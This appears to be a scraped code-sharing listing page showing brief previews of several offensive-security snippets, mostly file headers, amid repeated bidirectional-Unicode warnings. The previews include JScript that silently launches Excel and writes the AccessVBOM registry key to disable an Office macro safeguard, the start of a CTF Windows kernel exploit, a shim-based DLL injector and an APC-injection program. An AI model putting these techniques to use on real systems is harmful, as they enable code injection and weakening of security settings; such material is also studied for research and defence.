This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Hi~ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script> | |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
#include <windows.h> | |
#include <Winbase.h> | |
#include <Wtsapi32.h> | |
#include <Userenv.h> | |
#include <malloc.h> | |
#pragma comment(lib, "Wtsapi32.lib") | |
#pragma comment(lib, "Userenv.lib") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os, binascii | |
from flask import Flask, Response, abort | |
def random_etag(): | |
return "1000-" + binascii.b2a_hex(os.urandom(6)) | |
app = Flask(__name__) | |
PORT = 80 | |
DLL_ETAG = random_etag() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <sys/types.h> | |
#include <dirent.h> | |
#include <errno.h> | |
#include <vector> | |
#include <string> | |
#include <iostream> | |
using namespace std; | |
// getdir - returns vector of files in all directories of directory |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// WCTF 2018 "searchme" task exploit | |
// | |
// Author: Mateusz "j00ru" Jurczyk | |
// Date: 6 July 2018 | |
// Tested on: Windows 10 1803 (10.0.17134.165) | |
// | |
// See also: https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/ | |
#include <Windows.h> | |
#include <winternl.h> | |
#include <ntstatus.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
-------- dllinjshim.cpp -------- | |
> cl /Fe:dllinjshim.exe dllinjshim.cpp | |
> dllinjshim.exe | |
> sdbinst moo.sdb | |
/!\ On Windows 10 there is a new function `SdbIsKnownShimDll` called | |
in `SdbGetDllPath` which will check the DLL name against the following list: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace DinjectorWithQUserAPC | |
{ | |
public class Program |
OlderNewer